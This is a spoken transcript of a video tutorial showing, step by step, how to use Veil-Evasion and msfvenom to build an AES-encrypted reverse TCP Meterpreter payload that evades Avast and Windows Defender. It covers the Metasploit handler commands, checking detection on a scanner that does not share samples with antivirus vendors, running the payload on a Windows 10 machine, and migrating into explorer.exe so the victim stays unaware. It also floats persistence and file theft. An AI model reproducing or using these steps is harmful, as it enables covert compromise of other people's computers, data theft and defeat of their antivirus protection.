Hey guys, welcome back to a new video tutorial. Now I'm finally doing the video that has been requested for a very long time, and that is the veil evasion video on how to bypass an antivirus. So today I'm going to be creating a reverse TCP payload and then sending it to my Windows 10 test machine, which is running Avast free antivirus and also has Windows Defender installed. And all I'm going to do is send the file to it. The target's going to run it, and I don't have to disable any antiviruses or anything like that. It's going to bypass it. So I'm going to show you how to create that encrypted payload. I'm going to show you what the detection rate is on it, and yeah, that's basically it. So remember to smash that like button if you enjoy the video, because it's been requested a lot and I finally got around to doing it. So I've already done a video on veil evasion before. Actually, no, that's a lie. I've already done a video on veil before, and you can see I've already got it installed here. So if you haven't done already, you need to watch the video that is on screen now before you continue with this video, or else you're going to run into problems. So go inside the veil folder, and we've got veil evasion here, and you also have the update.py. So all you need to do is, first of all, is run that update.py. So I'm going to go straight to a terminal anyway, and I'm going to cd to my veil folder, if I can spell, and then cd to my veil evasion folder, and then cd to my config folder, and then I'm going to run in here update.py. So this is the first thing that you need to do, which is going to set all the paths. If you don't set the paths, the program is not going to work. So then just go open folder by typing cd ... and then there is going to be veil evasion.py. Go ahead and run veil evasion.py. And the reason I like veil evasion so much is that it ties in with Metasploit. So I can create a payload from here that is also going to have the connection settings for my payload, and I don't have to do any other work. All I have to do then is just run the MSF console, and I'm all good to go. So this is what the main menu of veil evasion looks like. I'm running version 2.27.2, and if you type in list, you can list the available payloads. So I'm going to just go ahead and type in list. And then you have the numbers with their corresponding payloads. So you've got lots of different ones here, but the one we're going to be looking at today is number 35. Number 35 is the Python shellcode inject AES encrypt. And this is what we're going to use to bypass the Avast antivirus. So go ahead and type in use 35, and then that's going to start the generation process for the payload. So on this menu, you can change some settings around, but we're going to skip this and just go ahead and type in generate. Once you've typed in generate, you're going to have some options here to either use MSF Venom or supply some custom shellcode. So I've already talked about MSF Venom in the past. It's how to create reverse TCP connection. So we are going to be using MSF Venom. So just go ahead and press 1. And then it's going to say, do you want to press enter to use the Windows Interpreter reverse TCP connection? And that is, that is what we want to do. Because it's so commonly used, the creator of veil evasion just put it there for you to just go ahead and press enter, and that's going to go ahead and set that for you. You then want to put in your lhost and local IP address, so go ahead and type in ifconfig. And from here we can get our iNet address, so yours is going to be different to mine, of course. I am doing this on a local network, but with port forwarding, you'll be able to get this working on a WAN network as well. So I'm just going to go ahead and type in that IP address, so 192.168.153.173. And then you want to set an L port, so I'm just going to use 4444. And then you want to enter any extra MSF Venom options, so just leave this blank and press enter. And that's going to generate the shellcode for us. So all we need to do now is encrypt it. So go ahead and press enter for the base name, unless you want to change the name from payload. So I'm just going to keep mine called payload, so just press enter. And then it's going to say, how would you like to create your payload executable? Would you like to use the Pywin installer, or would you like to use the Poon installer, or would you like to use py.exe? Go ahead and put 2 for the Poon installer, and that's going to go ahead and generate our payload. So let's just let that run for a little bit. Now, I will tell you now, the target machine is going to need a DLL file called MSV, something like that, MSVRC100. Chances are they're going to have it, but in some cases they might not. I had to put it on this machine, literally because from time to time when you install software, it has other frameworks that it needs, other libraries and DLL files that it uses. So over time, if you install a lot of programs, you're bound to have the missing DLL files. But for me, I have this completely raw installation of Windows, and that's why I didn't have it. So you don't need to worry about it too much. But if you are missing it, just go ahead and download that DLL file and put it in your syswow64 folder or your System32 folder, depending on which operating system you're running. Syswow is 64-bit and System32 is 32-bit. But anyway, it's going to go ahead and say your payload files have been generated, don't get caught. And also, please don't submit files to online scanners. Now, the reason he says this is very important. If you want to test the how much detection this file has, you can upload it to virus scanners. That's fair enough. But if you upload them to a virus scanner that has distribute, you're going to have a bad time. You're going to be sending that file to antivirus companies, and they can add the signature to their database, and then you are effectively ruining something that is good. So I'm going to be using a website called No Distribute here, and that is the website I'm going to be using because it doesn't distribute the files, and it has 35 antiviruses. So just go ahead and press any key to return to the main menu, and you want to go to this location here. So this is the user share folder. So all you need to do to get to that folder is go onto a file browser, click other locations on this computer, and then type in user, go into the user folder, type in share, and then go to the veil output folder, sorry, not the veil evasion, veil output. And then in here you're going to have compiled, and in there will be a payload. So if you've done this for the first time, it's going to say payload.exe. If you've done this once or twice, it's going to say what payload 1, payload 2, etc. So I'm just going to go ahead and put this onto No Distribute, see what kind of detection rate we've got. So the website I'm using is called https://nodistribute.com. I'll put a link to it in the description for you guys. But the key thing here is the results of the scans are never distributed. So let's go ahead and press browse, and well, let's just drag this to our desktop to make it easier to find. Go ahead and press browse again, upload the payload, and click scan file. And that's going to upload it and then scan it against 35 different antiviruses, and we can see what kind of results we're going to get. Additionally to this, I'm going to create another payload that is completely unencrypted for you guys so you can see the comparison. Okay, so this is an unencrypted payload. So this is called shell.exe. This is literally just MSF Venom. And you can see it has a detection rate of 24 out of 35 antiviruses. So if you have any of these antiviruses, that virus is going to get removed. So you can also tell here what doesn't really have doesn't really have its database of antivirus of viruses up to date. Now, on the other hand, which seems to have gone missing, I have my other payload here. So this is payload2.exe, and you can see it's detected by one single antivirus. And that antivirus in question is Antivirus Security, which detects it as a Trojan Python, which is exactly what it is. It's a Trojan that's encrypted in Python. Well, it's used Python to encrypt it in AES. But you can see here, Avast says it's clean. And what is our Windows 10 machine using? It's using Avast. So let's go ahead and set up MSF console to get our reverse connection back. So let's go ahead and type in MSF console, and then we're going to go ahead and send the payload to the Windows 10 machine and run it. So once Metasploit's open, you want to go ahead and type in use exploit /multi/handler, and then you want to type in when it loads. Oh, have I spelled something wrong? Exploit has been spelled wrong. Exploit. There we go. And then you want to use payload. Oh no, sorry. Set payload to the Windows interpreter. Reverse TCP. This is all stuff we've covered before if you watch my videos on a reg. And then you want to set the L host to the same IP address that you used to create the payload. So that's 15. No, that's not the right one. 153173, and also don't forget to set the L port to 4444, and then type in exploit-j-z, and that's going to start the payload handler, which is going to be waiting for a connection. So all I'm going to do now is drag the payload 2 to my desktop on my host machine, and then drag it onto the Windows 10 machine. And let's go ahead and run it. So you can see that Avast has kicked in. But guess what? No problems found. Sorry for the wait. The application will start in a few seconds. And we have a session that's been opened. Now, there you go. You've gained remote access to your machine that you want to test. So if I type in shell and then do message hello world. Oh, is message not a command anymore? Okay, fair enough. What we'll do then is we'll create a new file called penis and send that to penis.txt. Okay, that's not recognized. I don't know how to use command prompts anymore. But the point is that if I do sysinfo, wow, that's not even, I don't even know. Point is that this is a Windows 10 machine and the logged on users is 2, yada yada yada. I have taken over this PC, so if I close this, it doesn't really matter. Oh, unfortunately, it does die. That's a shame. There is probably a way to get around that. I reckon if you migrate, that won't be an issue. Let's just exit, and we'll do jobs-k, and just do exploit again. So I reckon there is a way to make it so that doesn't matter that if you do that. So once you've gained a session, I have a feeling, could be wrong, if you migrate to a different host, so let me just think, or rather remember what the migration command is. I want to see what the commands are. PS. Okay, so let's migrate to, let's have a look. We will migrate to explorer.exe, so that is 2940. 2940. Migrating from yada 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 2940. Let's see if it'll migrate. If not, we'll use a different one. Migration is successful, so I should be able to close this. Yeah. And you can see also penis.txt was on the desktop. But yeah, I've migrated now, and I still have connection to this guy's computer, and also they don't really know they've ran a virus. So always remember to migrate is basically the lesson to take away from this. And then of course you can go ahead and run persistence. I don't know if this will
threat has been detected.
Yeah, I got my answer. When you run persistence, it's not going to be encrypted. I unfortunately at the moment don't actually know how to get around that. But I guess if you're gonna, you can steal the files, and I don't know. Honestly, that could be an idea for a future video, how to run encrypted persistence. But you can see Avast actually blocked that attack, but they still can't see this. So that's good. But anyway, I'm going to end the video here because I've kind of shown what I needed to show. So if you enjoyed the video, remember to hit that like button. Also, comment below with any suggestions for future videos, and also leave some feedback on this video because I know a lot of people have been waiting for it. Hopefully this answers your questions. Don't forget to share this video with people who you think might enjoy it, and also subscribe if you haven't already if you're a new viewer.